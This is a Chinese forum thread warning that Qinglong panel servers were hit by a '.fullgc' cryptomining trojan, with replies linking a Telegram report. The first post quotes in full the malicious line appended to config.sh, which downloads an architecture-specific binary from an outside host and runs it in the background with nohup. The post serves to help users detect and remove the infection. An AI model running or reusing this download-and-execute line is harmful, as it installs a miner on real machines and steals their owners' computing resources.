奶昔论坛

标题: 快去检查你的青龙面板可能中挖矿木马了？ [打印本页]

作者: 倒霉鬼 时间: 昨天 22:37
标题: 快去检查你的青龙面板可能中挖矿木马了？

2026年2月7日，多名用户发现青龙面板被植入名为.fullgc的挖矿木马，导致服务器CPU占用率异常升至800%。该木马通过篡改config.sh配置文件实现持久化，并能根据系统架构自动下载恶意程序。排查结果显示，暴露于公网IPv4环境的服务器是该木马的主要攻击目标。

安全机构判定该程序属于SusMiner家族，主要通过连接XMR矿池进行非法挖矿。GitHub社区已出现多例相关案例报告，建议用户检查/ql/data/db/路径下的隐藏文件。受影响用户需清理恶意代码并关闭公网管理端口以防范后续风险。

检查\data\config\config.sh 最后一段有

d="${QL_DIR:-/ql}/data/db";b="$d/.fullgc";case "$(uname -s)-$(uname -m)" in Linux-x86_64|Linux-amd64)u="https://file.551911.xyz/fullgc/fullgc-linux-x86_64";;Linux-aarch64|Linux-arm64)u="https://file.551911.xyz/fullgc/fullgc-linux-aarch64";;Darwin-x86_64)u="https://file.551911.xyz/fullgc/fullgc-macos-x86_64";;Darwin-arm64)u="https://file.551911.xyz/fullgc/fullgc-macos-arm64";;esac;[ -n "$u" ]&&[ ! -f "$b" ]&&{ curl -fsSL -o "$b" "$u"||wget -qO "$b" "$u"; }&&chmod +x "$b";[ -f "$b" ]&&! ps -ef|grep -v grep|grep -qF ".fullgc"&&nohup "$b" >/dev/null 2>&1 &

删除然后重新创建镜像这个就是挖矿病毒不要再继续使用5700了换个端口

作者: 水杉 时间: 昨天 23:28
虽然论坛说过好多次了，但这次的是被一个大型频道拿出来说的
TG频道消息地址：https://t.me/zaihuapd/39866

作者: qlongjun 时间: 5 小时前
这么恐怖啊

欢迎光临奶昔论坛 (https://forum.naixi.net/)